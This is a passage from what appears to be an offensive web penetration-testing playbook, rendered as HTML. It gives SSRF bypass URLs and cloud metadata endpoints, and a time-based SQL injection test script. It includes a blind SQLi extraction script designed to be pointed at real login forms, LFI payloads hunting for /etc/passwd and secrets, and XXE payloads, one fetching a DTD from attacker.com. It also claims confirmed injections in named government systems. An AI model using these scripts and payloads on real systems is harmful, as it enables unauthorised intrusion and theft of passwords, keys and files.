&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;http:&lt;span style="color:#99d1db;font-weight:bold"&gt;//&lt;/span&gt;expected&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;com&lt;span style="color:#99d1db;font-weight:bold"&gt;@&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;127.0.0.1&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;http:&lt;span style="color:#99d1db;font-weight:bold"&gt;//&lt;/span&gt;expected&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;com&lt;span style="color:#737994;font-style:italic"&gt;#@127.0.0.1/&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 6. Shortened URLs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;http:&lt;span style="color:#99d1db;font-weight:bold"&gt;//&lt;/span&gt;bit&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;ly&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;xxxxx &lt;span style="color:#e78284"&gt;→&lt;/span&gt; redirect to metadata endpoint
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 7. DNS wildcard&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;http:&lt;span style="color:#99d1db;font-weight:bold"&gt;//&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;127.0.0.1&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;mydomain&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;com&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 8. Alternative representations&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;http:&lt;span style="color:#99d1db;font-weight:bold"&gt;//&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;127.1&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# = 127.0.0.1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;http:&lt;span style="color:#99d1db;font-weight:bold"&gt;//&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;0&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# = 0.0.0.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 9. IDN homograph&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;http:&lt;span style="color:#99d1db;font-weight:bold"&gt;//&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;127.0.0.1&lt;/span&gt;&lt;span style="color:#e78284"&gt;。&lt;/span&gt;attacker&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;com&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 10. Cloud metadata endpoints&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;http:&lt;span style="color:#99d1db;font-weight:bold"&gt;//&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;169.254.169.254&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;latest&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;meta&lt;span style="color:#99d1db;font-weight:bold"&gt;-&lt;/span&gt;data&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# AWS&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;http:&lt;span style="color:#99d1db;font-weight:bold"&gt;//&lt;/span&gt;metadata&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;google&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;internal&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;computeMetadata&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;v1&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# GCP&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;http:&lt;span style="color:#99d1db;font-weight:bold"&gt;//&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;169.254.169.254&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;metadata&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;instance&lt;span style="color:#e78284"&gt;?&lt;/span&gt;api&lt;span style="color:#99d1db;font-weight:bold"&gt;-&lt;/span&gt;version&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;2021&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;-&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;02&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;-&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;01&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Azure&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 11. File:// protocol&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;file:&lt;span style="color:#99d1db;font-weight:bold"&gt;///&lt;/span&gt;etc&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;passwd
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;file:&lt;span style="color:#99d1db;font-weight:bold"&gt;///&lt;/span&gt;proc&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;&lt;span style="color:#99d1db"&gt;self&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;environ
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="test-with-oob-out-of-band-callback" &gt;
&lt;div&gt;
&lt;a href="#test-with-oob-out-of-band-callback"&gt;
###
&lt;/a&gt;
Test with OOB (Out-of-Band) Callback
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If the SSRF is blind (no visible response), use a callback to confirm:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Generate unique URL on Burp Collaborator or webhook.site&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Inject into suspicious parameters (url=, path=, redirect=, file=)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. Check if the callback arrives&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="192-sqli--sql-injection" &gt;
&lt;div&gt;
&lt;a href="#192-sqli--sql-injection"&gt;
##
&lt;/a&gt;
19.2 SQLi — SQL Injection
&lt;/div&gt;
&lt;/h3&gt;
&lt;h4 id="quick-test-time-based-blind" &gt;
&lt;div&gt;
&lt;a href="#quick-test-time-based-blind"&gt;
###
&lt;/a&gt;
Quick Test (Time-Based Blind)
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;requests&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;time&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;url &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;http://target.com/login&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;payloads &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;normal&amp;#34;&lt;/span&gt;: {&lt;span style="color:#a6d189"&gt;&amp;#34;login&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;admin&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;senha&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;x&amp;#34;&lt;/span&gt;},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;sleep&amp;#34;&lt;/span&gt;: {&lt;span style="color:#a6d189"&gt;&amp;#34;login&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;admin&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;senha&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;x&amp;#39; OR SLEEP(5)--&amp;#34;&lt;/span&gt;},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;boolean&amp;#34;&lt;/span&gt;: {&lt;span style="color:#a6d189"&gt;&amp;#34;login&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;admin&amp;#39; OR &amp;#39;1&amp;#39;=&amp;#39;1&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;senha&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;x&amp;#34;&lt;/span&gt;},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;or_1&amp;#34;&lt;/span&gt;: {&lt;span style="color:#a6d189"&gt;&amp;#34;login&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;admin&amp;#39;+OR+1=1--&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;senha&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;x&amp;#34;&lt;/span&gt;},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; label, data &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; payloads&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;items():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; start &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; time&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;time()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;post(url, data&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;data, timeout&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;15&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; elapsed &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; (time&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;time() &lt;span style="color:#99d1db;font-weight:bold"&gt;-&lt;/span&gt; start) &lt;span style="color:#99d1db;font-weight:bold"&gt;*&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;1000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;label&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;elapsed&lt;span style="color:#a6d189"&gt;:&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.0f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;ms | Status: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt; | Size: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;&lt;span style="color:#99d1db"&gt;len&lt;/span&gt;(r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text)&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Typical result&lt;/strong&gt;: normal=44ms, sleep=8000ms → SQLi confirmed. Repeat the sleep payload two or three times and once with a different delay (SLEEP(10)): a single slow response can be network jitter or a busy backend, but a delay that tracks the value you chose cannot.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: 6 confirmed SQLi in the state government ecosystem:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;ESIC: Blind time-based on the password field (185ms normal → 10s+ with SLEEP)&lt;/li&gt;
&lt;li&gt;VOX: both login and password fields vulnerable&lt;/li&gt;
&lt;li&gt;Project Builder: Classic ASP with vulnerable login field&lt;/li&gt;
&lt;li&gt;ITERJ: login and password vulnerable&lt;/li&gt;
&lt;li&gt;CNPJ API: &lt;code&gt;search&lt;/code&gt; parameter vulnerable&lt;/li&gt;
&lt;li&gt;SIHAB-RJ: login and password vulnerable&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;All blind — extraction requires SQLmap or a dedicated script.&lt;/p&gt;
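&lt;p&gt;Added example (not code from the playbook): the kind of dedicated script the line above refers to. It binary-searches each character through a yes/no oracle, so a value costs about seven requests per character instead of one per candidate. The target here is a deliberately vulnerable in-memory SQLite login constructed for the example, standing in for the HTTP form; against a real target you replace &lt;code&gt;sim_login&lt;/code&gt; with something like the &lt;code&gt;http_login&lt;/code&gt; sketch (its URL and the &lt;code&gt;login&lt;/code&gt;/&lt;code&gt;senha&lt;/code&gt; field names are assumptions) that returns whether the response differs from the failed-login baseline. For MySQL swap &lt;code&gt;unicode(substr(...))&lt;/code&gt; for &lt;code&gt;ASCII(SUBSTRING(...))&lt;/code&gt;; a time-based variant wraps the same condition in &lt;code&gt;IF(cond, SLEEP(3), 0)&lt;/code&gt; and decides on latency instead of response size.&lt;/p&gt;

```python
import sqlite3

# --- Simulated target (constructed for this example) --------------------------
# An in-memory SQLite database behind a login query that concatenates user input:
# the same bug as the field cases above. It stands in for the HTTP login form.
def build_vulnerable_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, senha TEXT)")
    conn.execute("INSERT INTO users (login, senha) VALUES ('admin', 'S3cr3t!')")
    conn.commit()
    return conn

def sim_login(conn, login, senha):
    """Deliberately vulnerable: True when the (injected) query matches a row."""
    query = f"SELECT id FROM users WHERE login='{login}' AND senha='{senha}'"
    return conn.execute(query).fetchone() is not None

def http_login(url, login, senha, baseline_len):
    """Sketch of the real-target oracle (assumption: POST form with login/senha fields).
    Any stable difference from the failed-login response works: length, status, redirect."""
    import requests  # imported here so the offline demo does not need it installed
    r = requests.post(url, data={"login": login, "senha": senha}, timeout=15,
                      allow_redirects=False)
    return len(r.text) != baseline_len

# --- Extraction logic ---------------------------------------------------------
def make_oracle(login_fn):
    """Wrap a login function as ask(condition) -> True iff the injected condition held."""
    def ask(condition_sql):
        # Close the login literal, AND our condition, comment out the rest of the query.
        payload = f"admin' AND ({condition_sql}) -- "
        return login_fn(payload, "x")
    return ask

def binary_search(ask_gt, lo, hi):
    """Find v in the half-open range (lo, hi] given only ask_gt(n) == (v > n)."""
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if ask_gt(mid):
            lo = mid
        else:
            hi = mid
    return hi

def extract(ask, subquery, max_len=64):
    """Pull the scalar result of `subquery` one ASCII character at a time (SQLite functions)."""
    length = binary_search(lambda n: ask(f"length(({subquery})) > {n}"), 0, max_len)
    chars = []
    for pos in range(1, length + 1):
        code = binary_search(
            lambda n, p=pos: ask(f"unicode(substr(({subquery}), {p}, 1)) > {n}"), 0, 127)
        chars.append(chr(code))
    return "".join(chars)

def demo():
    """Recover the admin password from the simulated target through the oracle alone."""
    conn = build_vulnerable_db()
    ask = make_oracle(lambda login, senha: sim_login(conn, login, senha))
    return extract(ask, "SELECT senha FROM users WHERE login='admin'")

if __name__ == "__main__":
    print(demo())  # S3cr3t!
```

&lt;p&gt;The oracle is the only target-specific part. Everything after &lt;code&gt;make_oracle&lt;/code&gt; is generic, which is why a handful of these scripts covers all six cases above once each login&amp;rsquo;s success/failure difference has been identified.&lt;/p&gt;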
&lt;h3 id="193-lfi--path-traversal" &gt;
&lt;div&gt;
&lt;a href="#193-lfi--path-traversal"&gt;
##
&lt;/a&gt;
19.3 LFI / Path Traversal
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Classic payloads&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;paths &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;../../../etc/passwd&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;....//....//....//etc/passwd&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;..&lt;/span&gt;&lt;span style="color:#a6d189"&gt;%2f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;..&lt;/span&gt;&lt;span style="color:#a6d189"&gt;%2f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;..&lt;/span&gt;&lt;span style="color:#a6d189"&gt;%2f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;etc&lt;/span&gt;&lt;span style="color:#a6d189"&gt;%2f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;passwd&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;%2e%2e&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;%2e%2e&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;%2e%2e&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/etc/passwd&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;php://filter/convert.base64-encode/resource=index.php&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;php://filter/read=convert.base64-encode/resource=../../.env&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;file:///etc/passwd&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;....//....//....//proc/self/environ&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; p &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; paths:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;http://target.com/download?file=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;p&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;, timeout&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;10&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;root:&amp;#34;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text &lt;span style="color:#99d1db;font-weight:bold"&gt;or&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;DB_PASSWORD&amp;#34;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text &lt;span style="color:#99d1db;font-weight:bold"&gt;or&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;APP_KEY&amp;#34;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;🔥 LFI: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;p&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="194-xxe--xml-external-entity" &gt;
&lt;div&gt;
&lt;a href="#194-xxe--xml-external-entity"&gt;
##
&lt;/a&gt;
19.4 XXE — XML External Entity
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-xml" data-lang="xml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;&amp;lt;?xml version=&amp;#34;1.0&amp;#34; encoding=&amp;#34;UTF-8&amp;#34;?&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;&amp;lt;!DOCTYPE foo [
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt; &amp;lt;!ENTITY xxe SYSTEM &amp;#34;file:///etc/passwd&amp;#34;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;]&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;&amp;lt;data&amp;gt;&lt;/span&gt;&lt;span style="color:#81c8be"&gt;&amp;amp;xxe;&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;&amp;lt;/data&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;&amp;lt;!-- OOB (blind XXE) --&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;&amp;lt;!DOCTYPE foo [
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt; &amp;lt;!ENTITY % xxe SYSTEM &amp;#34;http://attacker.com/xxe.dtd&amp;#34;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; %xxe;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;]&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="195-ssti--server-side-template-injection" &gt;
&lt;div&gt;
&lt;a href="#195-ssti--server-side-template-injection"&gt;
##
&lt;/a&gt;
19.5 SSTI — Server-Side Template Injection
&lt;/div&gt;
&lt;/h3&gt;
